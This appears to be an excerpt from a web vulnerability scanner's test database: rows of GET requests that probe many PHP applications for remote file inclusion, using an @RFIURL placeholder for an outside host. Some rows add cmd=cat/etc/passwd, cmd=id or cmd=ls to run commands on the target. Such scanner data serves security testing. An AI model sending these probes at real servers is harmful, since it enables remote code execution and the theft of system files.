"004801","5292","c","/games.php?scoreid=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004802","5292","c","/gbook/includes/header.php?abspath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004803","5292","c","/gemini/page/forums/bottom.php?lang=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004804","5292","c","/gen_m3u.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004805","5292","c","/genepi.php?topdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004806","5292","c","/generate.php?ht_pfad=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004807","5292","c","/gepi/gestion/savebackup.php?filename=@RFIURL&cmd=cat/etc/passwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004808","5292","c","/gestArt/aide.php3?aide=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004809","5292","c","/get_session_vars.php?path_to_smf=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004810","5292","c","/getpage.php?page=online&doc_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004811","5292","c","/global.php?abs_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004812","5292","c","/gorum/dbproperty.php?appDirName=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004813","5292","c","/gpb/include/db.mysql.inc.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004814","5292","c","/gpb/include/db.mysql.inc.php?root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004815","5292","c","/gpb/include/gpb.inc.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004816","5292","c","/gpb/include/gpb.inc.php?root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004817","5292","c","/graph.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004818","5292","c","/gruppen.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004819","5292","c","/handlers/email/mod.listmail.php?_PM_[path][handle]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004820","5292","c","/handlers/page/show.php?sous_rep=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004821","5292","c","/head.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004822","5292","c","/header.inc.php?CssFile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004823","5292","c","/header.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004824","5292","c","/header.php?wwwRoot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004825","5292","c","/help.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004826","5292","c","/help/index.php?show=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004827","5292","c","/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004829","5292","c","/hioxBannerRotate.php?hm=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004830","5292","c","/hioxRandomAd.php?hm=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004831","5292","c","/hioxstats.php?hm=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004832","5292","c","/hioxupdate.php?hm=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004833","5292","c","/home.php?a=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004834","5292","c","/home.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004835","5292","c","/home.php?pagina=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004836","5292","c","/home/www/images/doc/index2.php?type=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004837","5292","c","/home1.php?ln=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004838","5292","c","/home2.php?ln=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004839","5292","c","/hsList.php?subdir=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004840","5292","c","/htdocs/gmapfactory/params.php?gszAppPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004841","5292","c","/html/admin/modules/plugin_admin.php?_settings[pluginpath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004842","5292","c","/hu/modules/reg-new/modstart.php?mod_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004843","5292","c","/i_head.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004844","5292","c","/i_nav.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004845","5292","c","/iframe.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004846","5292","c","/image.php?url=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004847","5292","c","/impex/ImpExData.php?systempath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004848","5292","c","/import.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004849","5292","c","/importinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004850","5292","c","/in.php?returnpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004851","5292","c","/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004852","5292","c","/inc/config.inc.php?x[1]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004853","5292","c","/inc/design.inc.php?dir[data]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004854","5292","c","/inc/download_center_lite.inc.php?script_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004855","5292","c","/inc/formmail.inc.php?script_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004856","5292","c","/inc/gabarits.php?cfg_racine=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004857","5292","c","/inc/header.inc.php?ficStyle=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004858","5292","c","/inc/ifunctions.php?GLOBALS[phpQRootDir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004859","5292","c","/inc/inc.php?cfg_racine=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004860","5292","c","/inc/indexhead.php?fileloc=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004861","5292","c","/inc/irayofuncs.php?irayodirhack=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004862","5292","c","/inc/irayofuncs.php?irayodirhack=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004863","5292","c","/inc/libs/Smarty_Compiler.class.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004864","5292","c","/inc/libs/core/core.display_debug_console.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004865","5292","c","/inc/libs/core/core.load_plugins.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004866","5292","c","/inc/libs/core/core.load_resource_plugin.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004867","5292","c","/inc/libs/core/core.process_cached_inserts.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004868","5292","c","/inc/libs/core/core.process_compiled_include.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004869","5292","c","/inc/libs/core/core.read_cache_file.php?plugin_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004870","5292","c","/inc/linkbar.php?cfile=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004871","5292","c","/inc/login.php?pathCGX=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004872","5292","c","/inc/logingecon.php?pathCGX=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004873","5292","c","/inc/ltdialogo.php?pathCGX=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004874","5292","c","/inc/mtdialogo.php?pathCGX=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004875","5292","c","/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004876","5292","c","/inc/prepend.inc.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004877","5292","c","/inc/service.alert.inc.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004878","5292","c","/inc/settings.php?inc_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004879","5292","c","/inc/settings.ses.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004880","5292","c","/inc/shows.inc.php?cutepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004881","5292","c","/inc/sige_init.php?SYS_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004882","5292","c","/inc_group.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004883","5292","c","/inc_group.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004884","5292","c","/inc_manager.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004885","5292","c","/inc_manager.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004886","5292","c","/inc_newgroup.php.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004887","5292","c","/inc_newgroup.php.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004888","5292","c","/inc_smb_conf.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004889","5292","c","/inc_smb_conf.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004890","5292","c","/inc_user.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004891","5292","c","/inc_user.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004892","5292","c","/include.php?_APP_RELATIVE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004893","5292","c","/include.php?gorumDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004894","5292","c","/include.php?myng_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004895","5292","c","/include.php?path=psp/user.php&site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004896","5292","c","/include.php?path[docroot]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004897","5292","c","/include.php?sunPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004898","5292","c","/include/Beautifier/Core.php?BEAUT_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004899","5292","c","/include/HTML_oben.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004900","5292","c","/include/HTML_oben.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004901","5292","c","/include/SQuery/gameSpy2.php?libpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004902","5292","c","/include/bbs.lib.inc.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004903","5292","c","/include/class_yapbbcooker.php?cfgIncludeDirectory=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004904","5292","c","/include/classes.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004905","5292","c","/include/client.php?INCLUDE_DIR=@RFIURL? ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004906","5292","c","/include/cls_headline_prod.php?INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004907","5292","c","/include/cls_listorders.php?INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004908","5292","c","/include/cls_viewpastorders.php?INCLUDE_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004909","5292","c","/include/common.php?XOOPS_ROOT_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004910","5292","c","/include/common_functions.php?baros_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004911","5292","c","/include/config.inc.php?racine=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004912","5292","c","/include/copyright.php?tsep_config[absPath]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004913","5292","c","/include/customize.php?l=@RFIURL&text=Hello%20World","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004914","5292","c","/include/customize.php?l=@RFIURL&text=Hello%20World ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004915","5292","c","/include/default_header.php?script_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004916","5292","c","/include/define.php?INC_DIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004917","5292","c","/include/disp_form.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004918","5292","c","/include/disp_smileys.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004919","5292","c","/include/dom.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004920","5292","c","/include/dtd.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004921","5292","c","/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004922","5292","c","/include/engine/content/elements/menu.php?CONFIG[AdminPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004923","5292","c","/include/forms.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004924","5292","c","/include/global.php?pfad=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004925","5292","c","/include/header.php?cs_base_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004926","5292","c","/include/html/nettools.popup.php?DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004927","5292","c","/include/inc.foot.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004928","5292","c","/include/inc_ext/spaw/dialogs/table.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004929","5292","c","/include/inc_freigabe.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004930","5292","c","/include/inc_freigabe.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004931","5292","c","/include/inc_freigabe1.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004932","5292","c","/include/inc_freigabe1.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004933","5292","c","/include/inc_freigabe3.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004934","5292","c","/include/inc_freigabe3.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004935","5292","c","/include/include_stream.inc.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004936","5292","c","/include/include_top.php?g_include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004937","5292","c","/include/includes.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004938","5292","c","/include/index.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004939","5292","c","/include/init.inc.php?G_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004940","5292","c","/include/issue_edit.php?INCLUDE_DIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004941","5292","c","/include/lib/lib_slots.php?main_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004942","5292","c","/include/lib/lib_stats.php?main_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004943","5292","c","/include/lib/lib_users.php?main_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004944","5292","c","/include/little_news.php3?cfg_include_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004945","5292","c","/include/livre_include.php?no_connect=lol&chem_absolu=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004946","5292","c","/include/loading.php?path_include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004947","5292","c","/include/mail.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004948","5292","c","/include/menu_builder.php?config[page_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004949","5292","c","/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004950","5292","c","/include/monitoring/engine/MakeXML.php?fileOreonConf=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004951","5292","c","/include/parser.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004952","5292","c","/include/pear/IT.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004953","5292","c","/include/pear/IT.php?basepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004954","5292","c","/include/pear/ITX.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004955","5292","c","/include/pear/ITX.php?basepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
